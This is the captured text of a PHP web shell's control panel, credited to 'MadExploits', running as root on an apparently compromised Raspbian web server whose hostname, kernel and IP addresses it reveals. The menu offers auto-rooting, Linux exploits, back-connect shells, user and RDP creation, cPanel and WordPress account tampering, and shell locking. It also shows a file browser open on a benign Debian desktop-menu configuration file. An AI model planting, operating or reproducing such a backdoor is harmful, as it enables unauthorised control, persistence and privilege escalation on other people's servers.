Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
menu-methods /
[ HOME SHELL ]
Name
Size
Permission
Action
menu-xdg
1.36
KB
-rwxr-xr-x
openbox
1.81
KB
-rwxr-xr-x
xdg-desktop-entry-spec-apps
1.43
KB
-rwxr-xr-x
xdg-desktop-entry-spec-dirs
1.28
KB
-rwxr-xr-x
xdg-desktop-entry-spec-session...
1.5
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xdg-desktop-entry-spec-dirs
#!/usr/bin/install-menu # xdg desktop entry spec - directory generation # http://www.freedesktop.org/Standards/desktop-entry-spec # Copyright 2004 - Chris Cheney # Licensed under the GNU General Public License, version 2. !include lang.h !include menu.h compat="menu-2" outputencoding="UTF-8"; outputlanguage="C"; function section() = "Name=" title() "\n" forall(sections_translations(),"lang", "Name[" $lang "]=" translate($lang,title()) "\n"); function comment() = "Comment=" $longtitle "\n" forall(sections_translations(),"lang", "Comment[" $lang "]=" translate($lang,$longtitle) "\n"); function DirEntry() = "[Desktop Entry]\n" "Type=Directory\n" "Encoding=UTF-8\n" section() ifnempty($longtitle, comment()) "Icon=" ifelse(icon(),icon(), "debian" replacewith(tolower($section),"/ ","--")) "\n"; supported; x11 = ; text = ; endsupported; startmenu = ""; endmenu = ""; submenutitle = DirEntry(); treewalk = "M"; genmenu = ifempty($command,tolower("debian" replacewith($section,"/ ","--") ".directory")); rootsection = ""; prerun = "rm -rf '" prefix() "'"; removemenu = "rm -rf '" prefix() "'"; preoutput = ""; rootprefix = "/var/lib/menu-xdg/desktop-directories/menu-xdg"; userprefix = ".local/share/desktop-directories/menu-xdg";
Close